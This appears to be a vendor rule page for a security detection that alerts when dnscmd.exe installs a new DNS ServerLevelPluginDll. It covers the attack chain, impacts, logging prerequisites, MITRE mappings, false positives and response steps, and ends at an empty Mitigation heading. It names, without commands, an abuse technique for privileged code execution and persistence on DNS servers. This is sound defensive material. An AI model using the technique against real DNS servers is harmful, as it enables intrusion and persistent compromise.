New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

About the rule

Rule Type

Standard

Rule Description

dnscmd.exe is a legitimate Windows command-line utility used to manage DNS servers, including advanced configuration operations. Attackers may misuse dnscmd.exe to stealthily install a new ServerLevelPluginDll, an extension DLL with elevated privileges, on a DNS server, enabling arbitrary code execution, persistent access, and covert command and control.

Severity

Trouble

Rule journey

Attack chain scenario

Initial access → Privilege escalation → Abuse of dnscmd.exe (install ServerLevelPluginDll) → Impact

Impact

• Defense evasion
• Arbitrary code execution with system or service account rights
• Lateral movement within network
• Data exfiltration
• Infrastructure compromise

Rule Requirement

Prerequisites

Use the Group Policy Management Console to audit process creation and process termination.

Install Sysmon from Microsoft Sysinternals and download the Sysmon configuration file that includes process creation monitoring. Add network connection events to the configuration file to monitor all network activity.

Create a new registry key "Microsoft-Windows-Sysmon/Operational" in the directory "Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\" if not already created.

Criteria

Detection

Execution Mode

realtime

Log Sources

Active Directory

MITRE ATT&CK

Defense Evasion: Modify Registry (T1112),"Defense Evasion: Hijack Execution Flow - DLL Side-Loading (T1574.002), Persistence: Hijack Execution Flow - DLL Side-Loading (T1574.002), Privilege Escalation: Hijack Execution Flow - DLL Side-Loading (T1574.002)"

Security Standards

Enabling this rule will help you meet the security standard's requirement listed below:

DE.CM-01: Networks and network services are monitored to find potentially adverse events.

When this rule is triggered, you’re notified of an attempt to install or update a DNS ServerLevelPluginDll using dnscmd.exe. This supports detailed review of DNS server configurations, detection of potentially malicious plugin installations, and timely response to unauthorized changes, enabling rapid investigation and containment of emerging threats to DNS infrastructure.

Author

Florian Roth (Nextron Systems)

Future actions

Known False Positives

This rule may trigger during legitimate operations by administrators deploying authorized DNS server plugins or conducting approved maintenance. Carefully review plugin sources, digital signatures, and change management records for authenticity and business justification.

Next Steps

When this rule is triggered, the following measures can be implemented:

1. Identification: Identify if the flagged event is a new incident or part of an existing incident.
2. Analysis: Analyze the impact and extent of the incident to comprehend the severity of the attack using the Incident Workbench.
3. Response: Respond promptly by initiating an automated workflow to interrupt the network connections and cease the malicious process.
4. Reconfiguration: Strengthen plugin and administration controls, enforce digital signature validation for plugins, and update monitoring rules for more precise detection of similar events.

Mitigation